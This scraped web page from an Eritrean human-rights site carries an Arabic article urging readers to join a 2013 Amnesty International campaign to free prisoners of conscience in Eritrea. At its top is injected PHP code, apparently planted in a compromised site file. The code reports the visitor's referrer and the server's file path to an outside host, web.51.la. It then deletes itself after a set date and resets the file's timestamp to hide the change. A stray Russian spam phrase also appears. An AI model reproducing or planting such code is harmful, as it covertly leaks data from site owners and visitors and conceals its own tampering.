check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } فلنشارك في حملة منظمة العفو الدولية
кремлевская диета

فلنشارك في حملة منظمة العفو الدولية

User Rating: / 0
PoorBest 

 

 

 

 

فلنشارك في حملة منظمة العفو الدولية

من أجل إطلاق سراح المعتقلين تعسفياً في إريتريا

 

دشنت منظمة العفو الدولية بتاريخ 9 مايو 2013 حملة من أجل إطلاق سراح سجناء الضمير والكشف عن أماكن احتجازهم وذلك من خلال مذكرة وُجهت لرئيس الدولة أسياس أفورقي وقد احتوت المذكرة على ثلاثة مطالب هي:

1- المطالبة بالإطلاق الفوري لسراح جميع سجناء الرأي الذين اعتقلوا بسسب ممارستهم السلمية لحقهم في حرية التعبير، الرأي، تكوين الجمعيات أو ممارسة المعتقد.

2- التأكد بأن توجه لجميع السجناء الآخرين المشتبه بارتكابهم جرائماً تهماً معترف بها فوراً أو أن يطلق سراحهم فوراً والذين يتهموا يجب أن يقدموا لمحاكمة عادلة فوراً تفي بالمعايير الدولية.

3-   الكشف عن أماكن احتجاز ومصائر السجناء فوراً ومنحهم حق التواصل مع أسرهم ومحامهيم وإنهاء استخدام التعذيب وغيره من أساليب المعاملة السيئة وتوفير الرعابة الطبية.

ويناشد مركز سويرا لحقوق الإنسان كل المدافعين عن حقوق الإنسان الانضمام لهذه الحملة من خلال التوقيع على المذكرة المشار المتاحة على الرابط أدناه:

 

http://www.amnesty.org/en/appeals-for-action/20Eritrea

 

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player